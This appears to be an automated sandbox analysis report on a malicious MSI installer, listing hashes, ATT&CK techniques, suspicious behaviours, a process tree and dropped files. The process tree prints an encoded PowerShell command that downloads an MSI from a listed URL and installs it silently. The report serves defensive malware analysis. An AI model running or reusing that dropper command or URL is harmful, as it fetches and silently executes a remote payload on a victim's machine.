818d045f6ff8bb5b724aeb377a5872b6b39ba0c5c9eaa67e6870ae80010bea44

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
14-01-2024 15:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nf.msi
Size

1.1MB
MD5

d6d8c76b6638f4519ef9479055078a20
SHA1

be4471d3c684e1d91aca19f3f0b1cba6c7db6971
SHA256

8501cc18076fb71b8d394512d1bf32fc7cc00ad77a2d8b47bc175a337cc3129b
SHA512

8ec7b06a69a8c510544b79c644ac6ff875ea47419339bcc71e7da36761f81c6308f7a69341834447580fb4417f17765e897c1f396b1727f4a8add1bb4eb8a9c0
SSDEEP

24576:FUiYKztdfG8NQGafAtbe/IEFXsaV5C7eYVLsTPRDKeU:FUiYefNQGoARRaV5C77yPROe

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://jucatyo6.autodesk360.com/shares/download/file/SHd38bfQT1fb47330c9911d55948da91b2ea/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLnhsWHBlUVVCU2hhb1JVZlpvdE5uS1E_dmVyc2lvbj05

Signatures

Loads dropped DLL 4 IoCs

pid	Process
2084	MsiExec.exe
2084	MsiExec.exe
2084	MsiExec.exe
2084	MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI8A93.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8DCF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI93E9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9429.tmp	msiexec.exe
File created	C:\Windows\Installer\f768a36.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f768a36.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8EAB.tmp	msiexec.exe
File created	C:\Windows\Installer\f768a39.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f768a39.ipi	msiexec.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2676	msiexec.exe
2676	msiexec.exe
2436	powershell.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2960	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2960	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeSecurityPrivilege	2676	msiexec.exe
Token: SeCreateTokenPrivilege	2960	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2960	msiexec.exe
Token: SeLockMemoryPrivilege	2960	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2960	msiexec.exe
Token: SeMachineAccountPrivilege	2960	msiexec.exe
Token: SeTcbPrivilege	2960	msiexec.exe
Token: SeSecurityPrivilege	2960	msiexec.exe
Token: SeTakeOwnershipPrivilege	2960	msiexec.exe
Token: SeLoadDriverPrivilege	2960	msiexec.exe
Token: SeSystemProfilePrivilege	2960	msiexec.exe
Token: SeSystemtimePrivilege	2960	msiexec.exe
Token: SeProfSingleProcessPrivilege	2960	msiexec.exe
Token: SeIncBasePriorityPrivilege	2960	msiexec.exe
Token: SeCreatePagefilePrivilege	2960	msiexec.exe
Token: SeCreatePermanentPrivilege	2960	msiexec.exe
Token: SeBackupPrivilege	2960	msiexec.exe
Token: SeRestorePrivilege	2960	msiexec.exe
Token: SeShutdownPrivilege	2960	msiexec.exe
Token: SeDebugPrivilege	2960	msiexec.exe
Token: SeAuditPrivilege	2960	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2960	msiexec.exe
Token: SeChangeNotifyPrivilege	2960	msiexec.exe
Token: SeRemoteShutdownPrivilege	2960	msiexec.exe
Token: SeUndockPrivilege	2960	msiexec.exe
Token: SeSyncAgentPrivilege	2960	msiexec.exe
Token: SeEnableDelegationPrivilege	2960	msiexec.exe
Token: SeManageVolumePrivilege	2960	msiexec.exe
Token: SeImpersonatePrivilege	2960	msiexec.exe
Token: SeCreateGlobalPrivilege	2960	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeShutdownPrivilege	2640	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2640	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeRestorePrivilege	2676	msiexec.exe
Token: SeTakeOwnershipPrivilege	2676	msiexec.exe
Token: SeCreateTokenPrivilege	2640	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2640	msiexec.exe
Token: SeLockMemoryPrivilege	2640	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2640	msiexec.exe
Token: SeMachineAccountPrivilege	2640	msiexec.exe
Token: SeTcbPrivilege	2640	msiexec.exe
Token: SeSecurityPrivilege	2640	msiexec.exe
Token: SeTakeOwnershipPrivilege	2640	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2960	msiexec.exe
2960	msiexec.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2676 wrote to memory of 2084	2676	msiexec.exe	29
PID 2084 wrote to memory of 2436	2084	MsiExec.exe	30
PID 2084 wrote to memory of 2436	2084	MsiExec.exe	30
PID 2084 wrote to memory of 2436	2084	MsiExec.exe	30
PID 2084 wrote to memory of 2436	2084	MsiExec.exe	30
PID 2436 wrote to memory of 2708	2436	powershell.exe	32
PID 2436 wrote to memory of 2708	2436	powershell.exe	32
PID 2436 wrote to memory of 2708	2436	powershell.exe	32
PID 2436 wrote to memory of 2708	2436	powershell.exe	32
PID 2708 wrote to memory of 2640	2708	powershell.exe	33
PID 2708 wrote to memory of 2640	2708	powershell.exe	33
PID 2708 wrote to memory of 2640	2708	powershell.exe	33
PID 2708 wrote to memory of 2640	2708	powershell.exe	33
PID 2708 wrote to memory of 2640	2708	powershell.exe	33
PID 2708 wrote to memory of 2640	2708	powershell.exe	33
PID 2708 wrote to memory of 2640	2708	powershell.exe	33

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\nf.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2960

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F32417DFA4815FE985A32E53714220C4
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss94C3.ps1"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjADkANQA3ADEANQA2ADkANAA1AAoAJAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBqAHUAYwBhAHQAeQBvADYALgBhAHUAdABvAGQAZQBzAGsAMwA2ADAALgBjAG8AbQAvAHMAaABhAHIAZQBzAC8AZABvAHcAbgBsAG8AYQBkAC8AZgBpAGwAZQAvAFMASABkADMAOABiAGYAUQBUADEAZgBiADQANwAzADMAMABjADkAOQAxADEAZAA1ADUAOQA0ADgAZABhADkAMQBiADIAZQBhAC8AZABYAEoAdQBPAG0ARgBrAGMAMgBzAHUAZAAyAGwAdwBjAEgASgB2AFoARABwAG0AYwB5ADUAbQBhAFcAeABsAE8AbgBaAG0ATABuAGgAcwBXAEgAQgBsAFUAVgBWAEMAVQAyAGgAaABiADEASgBWAFoAbABwAHYAZABFADUAdQBTADEARQBfAGQAbQBWAHkAYwAyAGwAdgBiAGoAMAA1ACIACgAkAG8AdQB0ACAAPQAgACIAcwBlAHQAdQBwAC4AbQBzAGkAIgAKAGMAZAAgACQARQBOAFYAOgBwAHUAYgBsAGkAYwAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAkAHUAcgBpACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdAAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAbQBzAGkAZQB4AGUAYwAuAGUAeABlACIAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAvAGkAIAAkAG8AdQB0ACAALwBRAE4AIgAKACMANAAxADMANgAzADgAOAA3ADcAOAA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i setup.msi /QN
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f768a3a.rbs

Filesize
988B

MD5
56d7f8d122280b752c4c1f27932a80d3

SHA1
0695b0bdfc5947c8ca49406862bf70d25385dee4

SHA256
c87757bf1d8f30b4007446d59caa6dd18cf431179b32b2793fb6d0a65b46625c

SHA512
2b828fa7a246b69af841d83df995043577331cbacb6a8656123b11541b34c59e8b96ed51a6a2ddb607f7bf4fc4ec78cb8084c7317bf3c25c28fa4a231eb3d338

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI68804.LOG

Filesize
20KB

MD5
a05b39eb6960dd4675ecb1b49cb5f9cc

SHA1
06918767460243b8f87c6e555e76271975e50f33

SHA256
28c9e0d8abf5195eddfed49275349486bfca62587d5c5a41d5c442b23b42da8d

SHA512
6fde2e3aec816da0a18fda22a382909eb5372c0e36b38c71fab6000c37c2f43fa59dcc749e713cadbd8811f35f0a7536af4a29be4a20f3bc233fc8aaf24bf39d

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss94B2.ps1

Filesize
1KB

MD5
534146415925c27f916e8d61df1a7447

SHA1
6ee383a8cac3a2f12ee264e0d5110b5729c3473d

SHA256
a7f50044c017dba8c793e3561ad36a92dae6300c20218e1f8a0c49cb402a17b2

SHA512
2e0d328ff3817d5ce47c096187a28535948caef09f25aa35be392ecf0cbab913aa274d560ef92a49bc6b4c7d3d3303b93b46aabfbcdc5c10278c37d7b5673ec2

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss94C3.ps1

Filesize
5KB

MD5
506db3b8a4cbf46dfe1a25a409613865

SHA1
1f3166c6cd1b5a8b70a03e05a027947957a71641

SHA256
460386f162f9eaf8713046f3bc432ad15c702d02806a11fbd96895e11bd348f5

SHA512
62d03fcaf79c25c77dcdc170ea395f99de2ce728191a47be1d18654928b93325fc1a246c73abc4ffa2d6c81a39a7fa7ef41b919aeee2cd2fb1570afb316695af

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
43392a2ba51e17dd07ff49f7c543a58c

SHA1
09c22e62f05d80da20bf1197dd6edd64e5d28757

SHA256
de210a12b95189c2e8fdf4125fcb0daeda5fa439bee29bcc8f8ccf633591550b

SHA512
8b66b2e79913af633601f20a5502a819d54bbc18143d067a23ca2e6df1ec448d29374ea8fa321e76e4cb1be372a2622b32bdb99bac667d15c95373e230181d95

Download Submit
C:\Windows\Installer\MSI8A93.tmp

Filesize
364KB

MD5
ca95f207ec70ba34b46c785f7bcb5570

SHA1
25c0d45cb9f94892e2877033d06fe8909e5b9972

SHA256
8ac4b42fb36d10194a14c32f6f499a6ac6acb79adbec858647495ba64f6dd2bb

SHA512
c7003a2159f5adab0a3b4a4f3c0dd494d916062a57e84a23ccc18410fa394438d49208769027c641569b3025616e99ca1730a540846aaf1c5d91338b90008831

Download Submit
C:\Windows\Installer\MSI9429.tmp

Filesize
616KB

MD5
06e0529fe6867f9c70539152c7b9ca20

SHA1
9ca5f00f72ff4526494aa7a9ef9078f635cddbc5

SHA256
d2bd81b0d5d0e1b24f941b36c76ace67008abe13a9f3f28515efe9f110a0dc93

SHA512
39c779595dfe9b368c41d1e86686cec1cf90a65d118f3553a56e4434aa6b5a6ed9aec17cd2b7b5065ff93d67609d4ec4e89b6135fc3998ba1423788f869cf081

Download Submit
memory/2436-23-0x0000000072ED0000-0x000000007347B000-memory.dmp

Filesize
5.7MB

Download
memory/2436-25-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/2436-24-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/2436-39-0x0000000072ED0000-0x000000007347B000-memory.dmp

Filesize
5.7MB

Download
memory/2436-22-0x0000000072ED0000-0x000000007347B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-33-0x0000000072ED0000-0x000000007347B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-34-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2708-35-0x0000000072ED0000-0x000000007347B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-36-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2708-37-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2708-38-0x0000000072ED0000-0x000000007347B000-memory.dmp

Filesize
5.7MB

Download